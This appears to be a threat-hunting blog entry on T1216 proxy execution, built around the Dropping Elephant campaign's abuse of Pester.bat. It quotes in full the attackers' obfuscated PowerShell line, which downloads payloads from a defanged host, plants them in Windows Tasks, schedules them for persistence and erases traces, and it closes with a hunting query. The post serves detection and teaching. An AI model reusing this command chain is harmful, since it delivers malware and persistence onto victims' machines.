207. Dropping Elephant Misuses Pester to Execute Malicious PowerShell Commands
Hello everyone!
Let's look at how adversaries leverage the following technique - System Script Proxy Execution (T1216). But we need an example, of course. And we have it! Dropping Elephant campaign againts Turkish defense contractors described by Arctic Wolf.
Once again the threat actors used malicious LNK files. And this time they abused Pester.bat to execute malicious PowerShell commands:
"C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" ;powershell s''l''eep 1;$ProgressPreference = 'SilentlyContinue';$a='https:';$b='C:\Users\';$c='C:\Windows\';wg''et $a//expouav[.]org/download/fetch/list3/12717/view/0d5a0411-0a85-42cf-928c-dd9218019f3b -OutFile $b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf;s''ap''s "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf";wg''et $a//expouav[.]org/download/fetch/list7/40275/view/e49c7ae0-f3d1-4073-83bb-b4ecba929fec -Outfile $c\Tasks\lama;r''e''n -Path "$c\Tasks\lama" -NewName "$c\Tasks\vlc.pepxpe";r''e''n -Path "$c\Tasks\vlc.pepxpe" -NewName ((Split-Path "$c\Tasks\vlc.pepxpe" -Leaf) -replace "p", "");wg''et $a//expouav[.]org/download/fetch/list5/19577/view/b5aaa6f0-6259-4ccb-b31a-d21e40c2eeff -Outfile $c\Tasks\lake;r''e''n -Path "$c\Tasks\lake" -NewName "$c\Tasks\libvlc.pdplpl";r''e''n -Path "$c\Tasks\libvlc.pdplpl" -NewName ((Split-Path "$c\Tasks\libvlc.pdplpl" -Leaf) -replace "p", "");wg''et $a//expouav[.]org/download/fetch/list6/41568/view/701bbff4-8fcb-4e9c-8577-00aed06d8443 -Outfile $c\Tasks\dalai;r''e''n -Path "$c\Tasks\dalai" -NewName "$c\Tasks\Winver.pepxpe";r''e''n -Path "$c\Tasks\Winver.pepxpe" -NewName ((Split-Path "$c\Tasks\Winver.pepxpe" -Leaf) -replace "p", "");c''p''i "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf" -destination .;wg''et $a//expouav[.]org/download/fetch/list8/20041/view/c6795195-6e84-4720-9420-e03da09b2187 -OutFile $c\Tasks\vlc.log;$d="$c\Tasks\Winver";s''ap''s $d -a "/Create", '/sc', 'minute', '/tn', 'NewErrorReport', '/tr', "$c\Tasks\vlc", '/f';e''r''a''s''e *d?.?n?
As it's usually not very commonly used, we can build a simple hunting query:
event_type: "processcreatewin"
AND
proc_file_path: "cmd.exe"
AND
cmdline: "pester.bat"
See you tomorrow!
Comments
Post a Comment